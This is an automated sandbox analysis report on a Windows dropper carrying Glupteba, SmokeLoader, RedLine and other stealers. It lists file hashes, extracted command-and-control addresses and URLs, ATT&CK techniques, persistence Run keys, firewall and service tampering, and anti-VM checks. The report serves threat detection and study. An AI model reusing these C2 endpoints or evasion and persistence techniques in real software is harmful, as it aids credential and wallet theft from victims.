glupteba | d26a9709d67ba276379e3f0aaeeced122423e2e791600d3e70ae3630c15fc003

Analysis

max time kernel
140s
max time network
176s
platform
windows10-2004_x64
resource
win10v2004-20231025-en
resource tags

arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
submitted
19-11-2023 23:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe
Size

1.4MB
MD5

06545d2660b4542598943edb73268b27
SHA1

2bf583ca949eba1c5dbf7a3b0e2a44c2a7e00331
SHA256

afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733
SHA512

9f7f846cb10b52522891a4687d4114c7dda01fba82a8e11fd4b7169c779e5ac8a222617c1af9bd9936108e43db5426b17b74e100a224a97abd2c7a63c61d3646
SSDEEP

24576:9y0J89DmUCFLBO4Z5MghMbXTeaIs4qnGKNkDglwQlpkOv4iM/v+yK:YPlmUCdZ5T+jeh/UGjDQlpk13+

Malware Config

Extracted

Family

smokeloader

Version

2022

http://5.42.92.190/fks/index.php

rc4.i32

Extracted

Family

redline

Botnet

taiga

5.42.92.51:19057

Extracted

Family

redline

Botnet

pixelfresh

194.49.94.11:80

Extracted

Family

redline

Botnet

@ytlogsbot

194.169.175.235:42691

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

redline

Botnet

LiveTraffic

195.10.205.16:1056

Signatures

Detect Mystic stealer payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4604-48-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/4604-49-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/4604-50-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/4604-52-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5420-744-0x0000000002DC0000-0x00000000036AB000-memory.dmp	family_glupteba
behavioral1/memory/5420-765-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/5112-1567-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Mystic
Mystic is an infostealer written in C++.
stealer mystic
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/6032-97-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/memory/4600-582-0x0000000000AB0000-0x0000000000ACE000-memory.dmp	family_redline
behavioral1/memory/4552-656-0x0000000000400000-0x0000000000470000-memory.dmp	family_redline
behavioral1/memory/7772-657-0x0000000000400000-0x0000000000449000-memory.dmp	family_redline
behavioral1/memory/7772-658-0x00000000001C0000-0x00000000001FE000-memory.dmp	family_redline
behavioral1/memory/4552-659-0x0000000000720000-0x000000000077A000-memory.dmp	family_redline
behavioral1/memory/9156-1374-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4600-582-0x0000000000AB0000-0x0000000000ACE000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

latestX.exe

description pid process target process

PID 3404 created 3304 3404 latestX.exe Explorer.EXE
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exe

pid process

1412 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

8335.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation 8335.exe

description	pid	process	target process
PID 3404 created 3304	3404	latestX.exe	Explorer.EXE

pid	process
1412	netsh.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	8335.exe

Executes dropped EXE 23 IoCs

Processes:

yV8Rq22.exeGJ6iM34.exeIW8qq02.exe1Nr74BH7.exe2ne4059.exe7KP38yy.exe8iC574jv.exe9Ei0mD5.exe8335.exeA10E.exeA70B.exeInstallSetup5.exeBD53.exetoolspub2.exe31839b57a4f11171d6abc8bbc4451ee4.exetoolspub2.exeBroom.exelatestX.exe1893.exe31839b57a4f11171d6abc8bbc4451ee4.exe5494.exe5754.exe58AC.exe

pid	process
4300	yV8Rq22.exe
112	GJ6iM34.exe
2572	IW8qq02.exe
2684	1Nr74BH7.exe
4292	2ne4059.exe
2664	7KP38yy.exe
5936	8iC574jv.exe
6112	9Ei0mD5.exe
9020	8335.exe
4600	A10E.exe
7772	A70B.exe
6968	InstallSetup5.exe
4552	BD53.exe
400	toolspub2.exe
5420	31839b57a4f11171d6abc8bbc4451ee4.exe
6416	toolspub2.exe
2836	Broom.exe
3404	latestX.exe
5384	1893.exe
5112	31839b57a4f11171d6abc8bbc4451ee4.exe
5892	5494.exe
848	5754.exe
7900	58AC.exe

Loads dropped DLL 4 IoCs

Processes:

A70B.exeBD53.exe

pid process

7772 A70B.exe
7772 A70B.exe
4552 BD53.exe
4552 BD53.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
7772	A70B.exe
7772	A70B.exe
4552	BD53.exe
4552	BD53.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

GJ6iM34.exeIW8qq02.exeafa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exeyV8Rq22.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	GJ6iM34.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	IW8qq02.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	yV8Rq22.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe	autoit_exe

Detected potential entity reuse from brand paypal.
phishing paypal

Drops file in System32 directory 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

2ne4059.exe8iC574jv.exe9Ei0mD5.exetoolspub2.exe1893.exe

description	pid	process	target process
PID 4292 set thread context of 4604	4292	2ne4059.exe	AppLaunch.exe
PID 5936 set thread context of 6032	5936	8iC574jv.exe	AppLaunch.exe
PID 6112 set thread context of 4428	6112	9Ei0mD5.exe	AppLaunch.exe
PID 400 set thread context of 6416	400	toolspub2.exe	toolspub2.exe
PID 5384 set thread context of 3416	5384	1893.exe	ADelRCP.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

8556 sc.exe
8960 sc.exe
2572 sc.exe
8984 sc.exe
8976 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

5452 4604 WerFault.exe AppLaunch.exe
7204 4552 WerFault.exe BD53.exe
7212 7772 WerFault.exe A70B.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

pid	process
8556	sc.exe
8960	sc.exe
2572	sc.exe
8984	sc.exe
8976	sc.exe

pid	pid_target	process	target process
5452	4604	WerFault.exe	AppLaunch.exe
7204	4552	WerFault.exe	BD53.exe
7212	7772	WerFault.exe	A70B.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

7KP38yy.exetoolspub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7KP38yy.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7KP38yy.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7KP38yy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

31839b57a4f11171d6abc8bbc4451ee4.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

7KP38yy.exeExplorer.EXE

pid	process
2664	7KP38yy.exe
2664	7KP38yy.exe
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE
3304	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

7KP38yy.exetoolspub2.exe

pid process

2664 7KP38yy.exe
6416 toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

Processes:

msedge.exe

pid	process
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEA10E.exe

description	pid	process
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
